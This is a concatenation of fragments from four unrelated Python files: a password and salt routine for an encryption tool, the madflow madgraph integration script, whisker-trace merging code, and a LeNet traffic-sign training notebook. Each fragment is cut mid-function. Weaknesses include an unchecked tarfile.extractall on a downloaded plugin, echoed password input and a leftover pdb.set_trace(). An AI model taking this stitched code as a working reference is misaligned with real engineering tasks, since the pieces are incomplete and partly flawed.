finally:
self.local_storage.dispose_tempfile(temp_file_path)
self.logger.debug("Salted loaded.")
else:
self.salted_key = None
self.logger.debug("Salted file doesnt exist, type your password again.")
if self.salted_key is None:
self._capture_password_salted()
self.logger.debug("Saving your salted password hash...")
temp_file_path = self.local_storage.get_new_tempfile()
try:
with temp_file_path.open("wb") as file:
file.write(self.salted_key)
self.local_storage.pack(temp_file_path, salted_path, self.app_key)
finally:
self.local_storage.dispose_tempfile(temp_file_path)
self.logger.debug("Password saved.")
else:
self.logger.debug(
"Encryption salted password save/load disabled, capturing and using live..."
)
self._capture_password_salted()
def _capture_password_salted(self):
"""
This function capture the password typed by the user, load and apply the salt (if salt is not
found on remote, its generated and saved). At the end of a succesful execution we have set
the self.salted_key.
"""
while True:
password = input(
"Type your encryption password (min length: 8, type 'e' to exit):"
)
if len(password) == 0:
print("Password cant be empty.")
elif password == "e":
self.logger.debug("Password capture cancelled, exiting.")
self._exit(1)
elif len(password) < 8:
print("Password length need to be at least 8 characters.")
else:
print("Password accepted.")
break
self.logger.debug("Loading salt...")
if self.remote_storage.has_salt():
salt = self.remote_storage.get_salt()
self.logger.debug("Salt loaded.")
else:
self.logger.debug("Salt not found, generating new one...")
salt = crypto.generate_salt()
self.logger.debug("Saving salt...")
self.remote_storage.set_salt(salt)
self.logger.debug("New salt saved.")
self.logger.debug("Generating salted password hash...")
self.salted_key = crypto.apply_salt(password.encode(), salt)
self.logger.debug("Salted password hash generation done.")
def setup(self, remote_storage_type):
"""
Prepare the App to start operating.
Load configs from the Config file, setup loggers used by other classes,
| |
# <gh_stars>0
#!/usr/bin/env python3
"""
Example script that goes from the generation of a matrix element
to the integration with the corresponding cuts
The matrix element run by default is: g g > t t~
```
~$ madflow --madgraph_process "g g > t t~"
```
It is possible to apply some mock cuts (pt_min) with the option `--pt_cut` (defaults to 30)
By default the PDF and the strong coupling is computed for muF = muR = sum(mT)/2 but
a fixed value of the scale can be given with --fixed_scale (defaults to 91.46).
LHE files can be produced with the `--histograms` flag.
"""
import re
import sys
import time
import shutil
import tarfile
import requests
import datetime
import itertools
import importlib
import argparse
import tempfile
import subprocess as sp
from pathlib import Path
import logging
import numpy as np
from madflow.custom_op_generator import translate, compile_op
from madflow.config import (
get_madgraph_path,
get_madgraph_exe,
DTYPE,
DTYPEINT,
float_me,
int_me,
run_eager,
guess_events_limit,
)
from madflow.phasespace import PhaseSpaceGenerator
from vegasflow import VegasFlow
from pdfflow import mkPDF
import tensorflow as tf
DEFAULT_PDF = "NNPDF31_nnlo_as_0118"
logger = logging.getLogger(__name__)
# Note that if another process is run, the imports below
# must be changed accordingly, it can be made into options later on
_flav_dict = {"g": 21, "d": 1, "u": 2, "s": 3, "c": 4, "b": 5, "t": 6}
def _read_flav(flav_str):
    """Map a madgraph flavour string (e.g. ``g``, ``u``, ``t~``) to its PDG id."""
    pdg_id = _flav_dict.get(flav_str[0])
    if pdg_id is None:
        raise ValueError(
            f"Could not understand the incoming flavour: {flav_str} "
            "You can skip this error by using --no_pdf"
        )
    # A trailing tilde marks the antiparticle: flip the sign.
    return -pdg_id if flav_str[-1] == "~" else pdg_id
def _import_module_from_path(path, module_name):
    """Import the python file at ``path`` and return it as module ``module_name``."""
    module_spec = importlib.util.spec_from_file_location(module_name, path)
    loaded = importlib.util.module_from_spec(module_spec)
    module_spec.loader.exec_module(loaded)
    return loaded
def _generate_madgraph_process(process, output_folder):
    """Given a process string in the madgraph format
    ex: g g > t t~
    generate the madgraph process file in the appropriate folder

    Runs the mg5 executable on a generated script and raises ValueError if
    the pyout plugin was not found by madgraph.
    """
    madgraph_script = f"""generate {process}
output pyout {output_folder}
"""
    # tempfile.mktemp is deprecated and race-prone (the returned name can be
    # claimed by another process before use); NamedTemporaryFile(delete=False)
    # creates the file atomically and keeps it around for madgraph to read.
    with tempfile.NamedTemporaryFile(
        "w", prefix="mad_script_", delete=False
    ) as script_handle:
        script_handle.write(madgraph_script)
        script_path = Path(script_handle.name)
    logger.debug("Writing madgraph output script at %s", script_path)
    mg5_command = [get_madgraph_exe(), "-f", script_path]
    mg5_p = sp.run(mg5_command, capture_output=True, check=True)
    # madgraph is not very helpful when the plugin is not found
    # so let's "brute force" that information
    parsed_output = mg5_p.stdout.decode()
    if "initialize a new directory: pyout" in parsed_output:
        logger.error(parsed_output)
        raise ValueError(
            "It seems madgraph was not able to find the pyout plugin. "
            f"Please, ensure the plugin is linked to {get_madgraph_path()}/PLUGIN/ "
            "For more information visit https://github.com/N3PDF/madflow"
        )
    logger.debug(parsed_output)
    # Since we have finished with -apparent- success, move the script to the output folder
    logger.debug("Saving the madgraph script in %s/", output_folder)
    # .as_posix() for python < 3.9 compatibility
    shutil.move(script_path.as_posix(), output_folder.as_posix())
    logger.info("Matrix files written to: %s", output_folder)
def _import_matrices(output_folder):
    """Given a folder with the pyout matrix_xxx.py files,
    import them all and instantiate the matrix element and model files.

    Returns (matrices, models): one instantiated matrix element and one
    model-parameter object per matrix_*.py file found.
    """
    # Make the generated modules importable by the matrix files themselves.
    sys.path.insert(0, output_folder.as_posix())
    re_name = re.compile(r"\w{3,}")
    matrices = []
    models = []
    # The SM model folder is the same for every matrix element; compute once.
    model_sm = get_madgraph_path() / "models/sm"
    for matrix_file in output_folder.glob("matrix_*.py"):
        matrix_name = re_name.findall(matrix_file.name)[0]
        matrix_module = _import_module_from_path(matrix_file, matrix_name)
        # Import specifically the matrix element
        matrix_element = getattr(matrix_module, matrix_name.capitalize())
        matrices.append(matrix_element())
        # Read the parameters of the model, shared among matrix elements
        model = matrix_module.import_ufo.import_model(model_sm.as_posix())
        # Instantiate matrix element and models
        model_params = matrix_module.get_model_param(
            model, (output_folder / "Cards/param_card.dat").as_posix()
        )
        models.append(model_params)
    return matrices, models
def _generate_initial_states(matrices):
    """Reads a list of matrices and outputs a list of tuples of initial states
    each element in the list will be a tuple ([flavours hadron 1, flavours hadron 2])
    for each matrix
    """
    initial_flavours = []
    for matrix in matrices:
        pairs = matrix.initial_states
        flavs_1, flavs_2 = zip(*pairs)
        if matrix.mirror_initial_states:
            # Mirrored processes swap which hadron provides which flavour.
            mirror_2, mirror_1 = zip(*pairs)
            flavs_1 = flavs_1 + mirror_1
            flavs_2 = flavs_2 + mirror_2
        initial_flavours.append((flavs_1, flavs_2))
    return initial_flavours
def _autolink(madpath):
    """Links the madflow madgraph plugin into the MG5_aMC directory
    If needed it downloads the plugin from the right github directory

    Interactive: may prompt before replacing an existing plugin folder, and
    exits the process on a missing madgraph path or user refusal.
    """
    try:
        madgraph_path = get_madgraph_path(madpath)
    except ValueError:
        print(
            """> The madgraph path could not be autodiscovered
> Please, set the MADGRAPH_PATH to the madgraph root directory
> Or add the exact path to --autolink (e.g. madflow --autolink /home/mg5)
and don't forget to set `export MADGRAPH_PATH=/path/to/madgraph` in your favourite .rc file!"""
        )
        sys.exit(0)
    # Check whether we already have a plugin there
    plugin_path = madgraph_path / "PLUGIN/pyout"
    if plugin_path.exists():
        print("The plugin folder already exists")
        yn = input("Do you want to remove it and link the new one? [y/n] ")
        if yn.lower() != "y" and yn.lower() != "yes":
            sys.exit(0)
        # Don't fully remove it, just move it around
        # (keep dated ".backup-..." copies, bumping a counter until free)
        new_path = plugin_path
        nn = 0
        while new_path.exists():
            today_name = datetime.datetime.now().strftime(f".backup-%d-%m-%y-n{nn}")
            new_path = new_path.with_suffix(today_name)
            nn += 1
        plugin_path.rename(new_path)
    # If this is a develop setup, link the repository version
    test_path = Path(__file__).parent / "../../../madgraph_plugin"
    if test_path.exists():
        print("Linking in development mode")
        plugin_path.symlink_to(test_path)
    else:
        # Download plugin
        latest_plugin = (
            "https://github.com/N3PDF/madflow/releases/latest/download/madgraph_plugin.tar.gz"
        )
        target_path = Path("/tmp/madgraph_plugin.tar.gz")
        print(f"Downloading plugin from github repository and untaring to {plugin_path}")
        response = requests.get(latest_plugin, stream=True)
        if response.status_code == 200:
            target_path.write_bytes(response.raw.read())
        # NOTE(review): extractall trusts member paths inside the downloaded
        # archive (path traversal risk); consider tarfile's filter= argument
        # (Python 3.12+) or validating members before extraction.
        with tarfile.open(target_path) as tar:
            tar.extractall(plugin_path.parent)
    print("Linking finished, exiting")
class _MadFlowAutolink(argparse.Action):
    """Wrapper action around _autolink.

    Used as ``action=`` for the ``--autolink`` flag: triggering the flag
    links the plugin (optionally given a madgraph path) and exits the parser.
    """
    def __init__(self, **kw):
        # nargs="?" makes the madgraph path argument optional
        super().__init__(nargs="?", **kw)
    def __call__(self, parser, namespace, values, option_string=None):
        # `values` is the (possibly None) madgraph path typed by the user
        _autolink(values)
        parser.exit(0)
def madflow_main(args=None, quick_return=False):
arger = argparse.ArgumentParser(__doc__)
arger.add_argument("--autolink", help="Link madflow with madgraph", action=_MadFlowAutolink)
arger.add_argument("-v", "--verbose", help="Print extra info", action="store_true")
arger.add_argument("-p", "--pdf", help="PDF set", type=str, default=DEFAULT_PDF)
arger.add_argument(
"--no_pdf", help="Don't use a PDF for the initial state", action="store_true"
)
arger.add_argument(
"--madgraph_process",
help="Set the madgraph process to be run",
type=str,
default="g g > t t~",
)
arger.add_argument(
"-m", "--massive_particles", help="Number of massive particles", type=int, default=2
)
arger.add_argument(
"-q",
"--fixed_scale",
help="Fix value of scale muR=muF (and alphas(q)), "
"if this flag is not provided take dynamical scale q2 = sum(mT)/2",
type=float,
nargs="?",
const=91.46,
)
arger.add_argument(
"-c",
"--pt_cut",
help="Enable a pt cut for the outgoing particles",
type=float,
nargs="?",
const=30.0,
)
arger.add_argument("--histograms", help="Generate LHE files/histograms", action="store_true")
arger.add_argument(
"-i", "--iterations", help="Iterations of vegasfow to run", type=int, default=10
)
arger.add_argument(
"-f", "--frozen_iter", help="Iterations with frozen grid", type=int, default=0
)
arger.add_argument(
"--events_per_device", help="How many events to send to each device", type=int
)
arger.add_argument(
"-o",
"--output",
help="Output folder for the madgraph output",
type=Path,
)
arger.add_argument(
"--dry_run", help="Generate the madgraph output but don't run anything", action="store_true"
)
arger.add_argument(
"--events_per_iteration",
help="How many events to run per iteration",
type=int,
default=int(1e6),
)
arger.add_argument(
"--custom_op", help="Use a Custom Operator for ME evaluation", action="store_true"
)
args = arger.parse_args(args)
if quick_return:
return args, None, None
# LheWriter needs to be imported after --autolink
from madflow.lhe_writer import LheWriter
if args.output is None:
output_path = Path(tempfile.mkdtemp(prefix="mad_"))
else:
output_path = args.output
if output_path.exists():
logger.warning(
"The %s folder is not empty and its content will be removed", output_path
)
yn = input("Do you want to continue? [y/n] ")
if yn.lower() != "y" and yn.lower() != "yes":
sys.exit(0)
_generate_madgraph_process(args.madgraph_process, output_path)
if args.custom_op:
translate(output_path)
compile_op(output_path)
if args.dry_run:
return None, None, None
matrices, models = _import_matrices(output_path)
if args.no_pdf:
initial_flavours = [None]
else:
pdf = mkPDF(args.pdf + "/0")
initial_flavours = _generate_initial_states(matrices)
# Prepare 1) the flavours we will ask pdfflow for
# 2) the indexes for the gathers
flavours_hadron_1, flavours_hadron_2 = zip(*initial_flavours)
# These are passed to pdfflow
hadron_1 = list(set(itertools.chain(*flavours_hadron_1)))
hadron_2 = list(set(itertools.chain(*flavours_hadron_2)))
gather_1 = []
gather_2 = []
for p1, p2 in initial_flavours:
gather_1.append([hadron_1.index(i) for i in p1])
gather_2.append([hadron_2.index(i) for i in p2])
### Set up some parameters for the process
sqrts = 13e3
# The number of particles is the same for all matrices
nparticles = int(matrices[0].nexternal)
ndim = (nparticles - 2) * 4 + 2
massive_particles = args.massive_particles
non_massive = nparticles - massive_particles - 2
# For this script the massive particles go always first
# as the output should always be to particles and not wrappers
# _if_ the number of masses is below the number of massive particle
param_masses = models[0].get_masses()
if len(param_masses) < massive_particles:
param_masses *= massive_particles
param_masses = [i.numpy() for i in param_masses]
masses = param_masses + [0.0] * non_massive
logger.debug("Masses: %s", masses)
###################################################
if args.fixed_scale is None:
logger.info("Set variable muF=muR=sum(mT)/2")
else:
logger.info("Setting fixed muF=muR=%.2f GeV.", args.fixed_scale)
q2 = float_me(args.fixed_scale**2)
if args.no_pdf:
alpha_s = 0.118
else:
alpha_s = np.squeeze(pdf.alphasQ2([q2]))
logger.info("Setting alpha_s = %.4f.", alpha_s)
# Fix all models
for model in models:
model.freeze_alpha_s(alpha_s)
# Create the phase space
phasespace = PhaseSpaceGenerator(nparticles, sqrts, masses, com_output=False)
# Register the cuts with the phase space
if args.pt_cut is not None:
for i in range(2, nparticles):
logger.info("Applying cut of pt > %.2f to particle %d", args.pt_cut, i)
phasespace.register_cut("pt", particle=i, min_val=args.pt_cut)
| |
"""
Author: <NAME>
Date : 2009
Copyright (c) 2009 HHMI. Free downloads and distribution are allowed for any
non-profit research and educational purposes as long as proper credit is given
to the author. All other rights reserved.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from builtins import next
from builtins import map
from builtins import zip
from builtins import object
from past.utils import old_div
from numpy import zeros, hypot
from .trace import Whisker_Seg
import pdb
from functools import reduce
def load():
    """Debug helper: read a test movie and its traced whiskers from disk.

    Returns (whiskers, movie) for interactive experimentation.
    """
    from ui.whiskerdata import load_whiskers, load_trajectories
    from ui.genetiff import Reader
    movie = Reader('../../data/JF8410_041808_001.tif',adjuststipple=1)
    w,wid = load_whiskers('test.whiskers')
    return w,movie
def merge_all( whiskers, shape, scale = 2 ):
    """Merge colliding whisker segments of every frame, in place.

    `whiskers` maps frame id -> {segment id: Whisker_Seg}; each frame's dict
    is rebuilt with the merged segments re-keyed from 0.
    """
    for fid,wvd in whiskers.items():
        print(fid)  # progress indicator: current frame id
        wv = merge_frame( wvd, shape, scale ).whiskers()
        wvd.clear()
        # re-key merged segments 0..n-1 (enumerate yields the (key, value)
        # pairs directly; no need to materialize a list first)
        wvd.update( enumerate(wv) )
def merge_frame( wvd, shape, scale = 2 ):
    """Resolve collisions between the whiskers of a single frame.

    Repeatedly pulls matches from the CollisionTable and folds them into a
    Resolution; segments shorter than 5 samples are pruned during merging.
    Returns the Resolution holding the merged paths.
    """
    table = CollisionTable( wvd, shape, scale )
    resolution = Resolution(list(wvd.values()))
    while True:
        match = next(table)
        if not match:
            break
        ownership = resolution.add(match, lambda e: len(e) < 5)
        table.update(ownership)
    return resolution
def breakout( w, bnd ):
    """Split whisker `w` at bounds bnd=[lo, hi] into (left, middle, right)."""
    lo, hi = bnd[0], bnd[1]
    left, rest = w.split(lo)
    # the second split index is relative to the remainder
    middle, right = rest.split(hi - lo)
    return left, middle, right
def trace_overlap(xxx_todo_changeme, xxx_todo_changeme1, thresh = 2.0 ):
    """Locate the index ranges over which two traces overlap.

    Both arguments are ``(whisker, index)`` pairs, where the index points at
    a position known to lie inside the overlap.  From there both traces are
    walked outwards in lockstep while the point-to-point distance stays
    below ``thresh``; when one trace runs out first, the other keeps moving
    downhill along the distance.  Assumes indexes run along the same
    direction (i.e. x is monotonically increasing along index).

    Returns ``(bnda, bndb)``: the ``[first, last]`` overlap bounds on each
    trace.
    """
    (wa, i) = xxx_todo_changeme
    (wb, j) = xxx_todo_changeme1

    def dist(ia, ib):
        pa, pb = wa[ia], wb[ib]
        return hypot(pa[0] - pb[0], pa[1] - pb[1])

    bnda = [i, i]
    bndb = [j, j]

    # --- walk backwards (towards index 0) ---
    ia, ib = i, j
    ms = 0
    while ms < thresh and ia > 0 and ib > 0:
        moves = ((ia - 1, ib - 1), (ia - 1, ib), (ia, ib - 1))
        scores = [dist(ka, kb) for ka, kb in moves]
        ms = min(scores)
        # take the first best move (matches original tie-breaking)
        ia, ib = moves[scores.index(ms)]
    # relax at boundary, move downhill
    if ia == 0 and ib == 0:
        pass
    elif ia == 0:
        last = ms
        s = dist(ia, ib - 1)
        while s < last and ib > 1:
            ib -= 1
            last = s
            s = dist(ia, ib - 1)
    elif ib == 0:
        last = ms
        s = dist(ia - 1, ib)
        while s < last and ia > 1:
            ia -= 1
            last = s
            s = dist(ia - 1, ib)
    bnda[0] = ia
    bndb[0] = ib

    # --- walk forwards (towards the ends of the traces) ---
    ia, ib = i, j
    ms = 0
    while ms < thresh and ia < len(wa) - 1 and ib < len(wb) - 1:
        moves = ((ia + 1, ib + 1), (ia + 1, ib), (ia, ib + 1))
        scores = [dist(ka, kb) for ka, kb in moves]
        ms = min(scores)
        ia, ib = moves[scores.index(ms)]
    # relax at boundary, move downhill
    if ia == len(wa) - 1 and ib == len(wb) - 1:
        pass
    elif ia == len(wa) - 1:
        last = ms
        s = dist(ia, ib + 1)
        while s < last and ib < len(wb) - 2:
            ib += 1
            last = s
            s = dist(ia, ib + 1)
    elif ib == len(wb) - 1:
        last = ms
        s = dist(ia + 1, ib)
        while s < last and ia < len(wa) - 2:
            ia += 1
            last = s
            s = dist(ia + 1, ib)
    bnda[1] = ia
    bndb[1] = ib
    return bnda, bndb
class Resolution(object):
def __init__(self, whiskers = None, shape = None, scale = 2):
self._paths = set()
self._index = {}
if whiskers:
for w in whiskers:
self._paths.add( (w,) )
self._index[w] = set([(w,)])
    def __len__(self):
        # number of distinct whisker paths currently tracked
        return len(self._paths)
def iterwhiskers(self):
""" Iterates over paths, yielding the whisker for each path """
join = lambda s,t: Whisker_Seg.join(s,t)
for p in self._paths:
yield reduce( join, p )
    def whiskers(self):
        """Return all joined whiskers as a list (see iterwhiskers)."""
        return list(self.iterwhiskers())
def add(self, conflicts, prune):
"""
`conflicts` is a match returned from CollisionTable.next() like: ( (whisker,hit), (whisker,hit) )
`prune` is a function mapping whisker segments to a boolean. Will prune if true.
Returns a dict that maps whiskers to corresponding left and right subsegments.
"""
a,b = conflicts
paths,ownership = self.compute_pairwise_conflict_paths( a, b, prune )
paths = set( [self._merge_middles(p) for p in paths] )
pdb.set_trace()
self.update( paths, a[0], ownership)
self.update( paths, b[0], ownership)
return ownership
def update( self, newpaths, owner, stubs ):
if 0:
from pylab import plot, cla, show
from .tests import plot_whiskers
cla()
plot(owner.x,owner.y,'k',linewidth=3)
plot_whiskers([e for e in p if e],marker='x')
show()
issame = lambda a,b: (a is not None) and (a==b) # true implies (b is not None)
br = stubs[owner]
if br:
didmerge = False
l,m,r = br # Filter paths to make sure only new paths
for p in newpaths:
if (not (l or r)) or issame(l,p[0]) or issame(r,p[-1]): # corresponding to `owner` are substituted
self._merge( owner, p )
didmerge = True
if not didmerge: # There was a break
self._merge( owner, None ) # But there was no parent path found that sourced the break...
    def _merge( self, owner, newp ):
        """Replace `owner` inside every path that references it.

        When `newp` is falsy, all paths containing `owner` are dropped
        instead.  Returns 1 after substitution, 0 after removal, None when
        `owner` is not tracked.
        """
        def substitute( op, a, np ):
            # Rebuild path `op` with element `a` replaced by the non-None
            # elements of `np`.
            def _iter():
                for i,e in enumerate(op):
                    if e == a:
                        break
                    yield e
                for e in np:
                    if e:
                        yield e
                # NOTE: relies on `i` retaining its value after the first
                # loop (index of the element that was replaced).
                for e in op[i+1:]:
                    yield e
            return tuple([e for e in _iter()])
        olds = self._index.get(owner) # fetch paths to update.
        if olds:
            if newp:
                news = set([ substitute( e, owner, newp ) for e in olds ]) # make new paths
                self._paths.update(news) # add new paths
                for e in newp:
                    self._index[e] = news # add mappings to new paths
                return 1
            else:
                for p in olds: # remove old paths
                    self._paths.discard(p)
                del self._index[owner] # remove mapping to old paths
                return 0
@staticmethod
def _merge_middles( path ):
if len(path)==4:
l,m1,m2,r = path
lm1,rm1 = m1.split( old_div(len(m1),2) )
lm2,rm2 = m2.split( old_div(len(m2),2) )
m = Whisker_Seg.join( lm1,rm2 )
return (l,m,r)
else:
return path
@staticmethod
def compute_pairwise_conflict_paths( a, b, prune ):
"""
a and b are each tuples of (whisker, hitindex), as returned from CollisionTable.next()
Returns a set of tuples.
"""
bnda,bndb = trace_overlap(a,b)
la,ma,ra = breakout(a[0],bnda)
lb,mb,rb = breakout(b[0],bndb)
ownership = {a[0]:(la,ma,ra), b[0]:(lb,mb,rb)}
if not ma or not mb or prune(ma) or prune(mb):
ownership = {a[0]:None, b[0]:None}
pset = set()
return pset, ownership
pset = [ [ la, ma, ra ],
[ la, ma, mb, rb ],
[ lb, mb, ma, ra ],
[ lb, mb, rb ] ]
#prune
for p in pset:
for i,w in enumerate(p):
if w and prune(w):
p[i] = None
#transform to set of tuples
pset = set( [tuple(e) for e in pset] )
#0. Path's must have legititmate middle nodes.
for p in list(pset):
if len(p)==3 and p[1] is None:
pset.remove(p)
elif len(p)==4 and ( p[1] is None or p[2] is None ):
pset.remove(p)
#reduction
hasfullpath = False
# 1. Remove if can't get from left to right
for p in list(pset):
if p[0] is None and p[-1] is None:
pset.discard(p)
if p[0] is not None and p[-1] is not None:
hasfullpath = True
# 2. if only overlap, return composite of overlap
if len(pset)==0: #no endpoints - this happens for middle-only overlaps
m = max( (ma,mb), key = lambda w: w.scores.mean() )
ownership = {a[0]:(None,m,None), b[0]:(None,m,None)}
#ownership = {a[0]:None, b[0]:None}
pset = set( ((None,m,None),) ) #return best scoring
return pset, ownership
# 3. if there is at least one path from left to right, remove paths that
# don't
if hasfullpath:
for p in list(pset):
if p[0] is None or p[-1] is None:
pset.discard(p)
else:
# 4. if not, path's should not begin or end on merged middles
for p in list(pset):
if len(p)==4 and ( p[0] is None or p[-1] is None ):
| |
= np.append(X_train_p,zoomed,axis=0)
# y_train_p2 = np.append(y_train_p,y_train_p)
# X_train_p = np.append(X_train_p2,sheared_images_result,axis=0)
# y_train_p = np.append(y_train_p2,y_train_p)
#zoomed, rotated and shear
# Stack the augmented variants (zoomed, rotated `result`, sheared) onto the
# training set; labels are duplicated in lockstep so each appended image
# block stays aligned with its labels (final set is 4x the original size).
X_train_p2 = np.append(X_train_p,zoomed,axis=0)
y_train_p2 = np.append(y_train_p,y_train_p)
X_train_p2 = np.append(X_train_p2,result,axis=0)
y_train_p2 = np.append(y_train_p2,y_train_p)
X_train_p = np.append(X_train_p2,sheared_images_result,axis=0)
y_train_p = np.append(y_train_p2,y_train_p)
#final check data (visual spot-check of augmented images, kept disabled)
# print(len(X_train_p))
# fig, axes = plt.subplots(2, 10, figsize = (15, 4.5))
# choice = np.random.choice(range(34799), 10)
# print(choice)
# for k in range(10):
#     axes[0][k].set_axis_off()
#     axes[0][k].imshow(X_train_p[choice[k,]]) #, interpolation = 'nearest', \
#     #cmap = 'gray')
#     axes[1][k].set_axis_off()
#     axes[1][k].imshow(X_train_p[choice[k,]+34799]) #, interpolation = 'nearest', cmap = 'gray')
# ### Model Architecture
# In[24]:
def LeNet(x):
    """Build a modified LeNet graph (TF1 style) and return the logits tensor.

    Input `x`: (batch, 32, 32, COLOR_CHANNELS) images. Output: (batch, 43)
    logits for the 43 traffic-sign classes.

    NOTE(review): dropout (0.5) is baked into the graph unconditionally, so
    it is also active during evaluation/inference; a keep_prob placeholder
    would be needed to disable it — confirm whether this is intended.
    """
    # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer
    mu = 0
    sigma = 0.1
    ## Layer 1: Convolutional. Input = 32x32xCOLOR_CHANNELS. Output = 28x28x6.
    # Weight and bias
    k_output = 6
    weight = tf.Variable(tf.truncated_normal( [5, 5, COLOR_CHANNELS, k_output], mean = mu, stddev = sigma ))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.nn.conv2d(x, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
    network = tf.nn.bias_add(network, bias) # Add bias
    # Activation.
    network = tf.nn.relu(network)
    #network = tf.nn.dropout(network, 0.5)
    # Pooling. Input = 28x28x6. Output = 14x14x6.
    network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
    ## Layer 2: Convolutional. Output = 10x10x16.
    k_output = 16
    weight = tf.Variable(tf.truncated_normal( [5, 5, 6, k_output], mean = mu, stddev = sigma ))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.nn.conv2d(network, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
    network = tf.nn.bias_add(network, bias) # Add bias
    # Activation.
    network = tf.nn.relu(network)
    #network = tf.nn.dropout(network, 0.5)
    # Pooling. Input = 10x10x16. Output = 5x5x16.
    network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
    # (a direct flatten of the 5x5x16 output was replaced by layer 2.5 below)
    #network = flatten(network)
    ## Layer 2.5: extra Convolutional layer. 5x5x16 -> 4x4x100.
    k_output = 100
    weight = tf.Variable(tf.truncated_normal( [2, 2, 16, k_output], mean = mu, stddev = sigma ))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.nn.conv2d(network, weight, strides=[1, 1, 1, 1], padding='VALID') # Apply Convolution
    network = tf.nn.bias_add(network, bias) # Add bias
    # Activation.
    network = tf.nn.relu(network)
    #network = tf.nn.dropout(network, 0.5)
    # Pooling. Input = 4x4x100. Output = 2x2x100.
    network = tf.nn.max_pool(network, ksize= [1,2,2,1], strides= [1,2,2,1], padding= 'VALID')
    # Flatten. Input = 2x2x100. Output = 400 (matches the 400-wide FC below).
    network = flatten(network)
    ## Layer 3: Fully Connected. Input = 400. Output = 120.
    k_output = 120
    weight = tf.Variable(tf.truncated_normal(shape=(400, k_output), mean = mu, stddev = sigma))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.matmul(network, weight) + bias
    # Activation + dropout (see NOTE in the docstring).
    network = tf.nn.relu(network)
    network = tf.nn.dropout(network, 0.5)
    ## Layer 4: Fully Connected. Input = 120. Output = 84.
    k_output = 84
    weight = tf.Variable(tf.truncated_normal(shape=(120, k_output), mean = mu, stddev = sigma))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.matmul(network, weight) + bias
    # Activation.
    network = tf.nn.relu(network)
    #network = tf.nn.dropout(network, 0.5)
    ## Layer 5: Fully Connected. Input = 84. Output = 43 logits.
    k_output = 43
    weight = tf.Variable(tf.truncated_normal(shape=(84, k_output), mean = mu, stddev = sigma))
    bias = tf.Variable(tf.zeros(k_output))
    network = tf.matmul(network, weight) + bias
    return network
# In[ ]:
#test
# print(type(X_train_p[0][0][0][0]))
# logits = LeNet(tf.constant(X_train_p[0], shape = (1, 32, 32, COLOR_CHANNELS)))
# print(logits)
# ### Train, Validate and Test the Model
# A validation set can be used to assess how well the model is performing. A low accuracy on the training and validation
# sets imply underfitting. A high accuracy on the training set but low accuracy on the validation set implies overfitting.
# In[27]:
### Train your model here.
### Calculate and report the accuracy on the training and validation set.
### Once a final model architecture is selected,
### the accuracy on the test set should be calculated and reported as well.
### Feel free to use as many code cells as needed.
#EPOCHS = 10
#BATCH_SIZE = 128
# Graph inputs: image batch and integer labels.
x = tf.placeholder(tf.float32, (None, 32, 32, COLOR_CHANNELS))
# NOTE(review): (None) is just None in parentheses, not a tuple — it works
# (fully dynamic shape) but (None,) was likely intended.
y = tf.placeholder(tf.int32, (None))
one_hot_y = tf.one_hot(y, 43)  # 43 traffic-sign classes
#train pipeline
rate = 0.001  # Adam learning rate
logits = LeNet(x)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits)
loss_operation = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate = rate)
training_operation = optimizer.minimize(loss_operation)
#evaluation ops: fraction of argmax matches
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))
accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
saver = tf.train.Saver()
def evaluate(X_data, y_data):
    """Run the accuracy and loss ops over `X_data`/`y_data` in batches.

    Returns (mean accuracy, mean loss); each batch's result is weighted by
    its actual size so a short final batch is handled correctly.
    """
    num_examples = len(X_data)
    acc_sum = 0
    loss_sum = 0
    sess = tf.get_default_session()
    for start in range(0, num_examples, BATCH_SIZE):
        stop = start + BATCH_SIZE
        batch_x = X_data[start:stop]
        batch_y = y_data[start:stop]
        accuracy, loss = sess.run([accuracy_operation, loss_operation],
                                  feed_dict={x: batch_x, y: batch_y})
        n = len(batch_x)
        acc_sum += accuracy * n
        loss_sum += loss * n
    return acc_sum / num_examples, loss_sum / num_examples
# -----------------------------------------------------------------------
# Per-epoch history, recorded for later plotting/analysis.
valid_acc = []
train_acc = []
valid_loss = []
train_loss = []
#run training
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    num_examples = len(X_train_p)
    print("Training...")
    print()
    total_time = 0
    for i in range(EPOCHS):
        start = time.time()
        # reshuffle every epoch so batches differ between epochs
        X_train_p, y_train_p = shuffle(X_train_p, y_train_p)
        for offset in range(0, num_examples, BATCH_SIZE):
            end = offset + BATCH_SIZE
            batch_x, batch_y = X_train_p[offset:end], y_train_p[offset:end]
            sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})
        # note: `end` is reused here as a timestamp after serving as a slice bound
        end = time.time()
        epoch_time = end - start
        total_time += epoch_time
        train_accuracy, train_loss_val = evaluate(X_train_p, y_train_p)
        validation_accuracy, validation_loss = evaluate(X_valid_p, y_valid)
        #save for later analysis
        train_acc.append(train_accuracy)
        train_loss.append(train_loss_val)
        valid_acc.append(validation_accuracy)
        valid_loss.append(validation_loss)
        # print("EPOCH {} ...".format(i+1))
        # print("Validation Accuracy = {:.3f}".format(validation_accuracy))
        print("EPOCH {} ...".format(i+1), " - Validation Accuracy = {:.3f}".format(validation_accuracy)," time: {:.4f}s".format(epoch_time))
        print()
    print("Total training time: : {:.4f}".format(total_time))
    saver.save(sess, './lenet_signs')
    print("Model saved")
# In[26]:
# plot accuracy and loss
#%matplotlib notebook
# get_ipython().run_line_magic('matplotlib', 'inline')
# import matplotlib.pyplot as plt
# epochs = range(1, len(train_acc) + 1)
# line_train, = plt.plot(epochs, train_loss, 'ro', label ='Training loss')
# line_valid, = plt.plot(epochs, valid_loss, 'b', label ='Validation loss')
# plt.title('Training and validation loss')
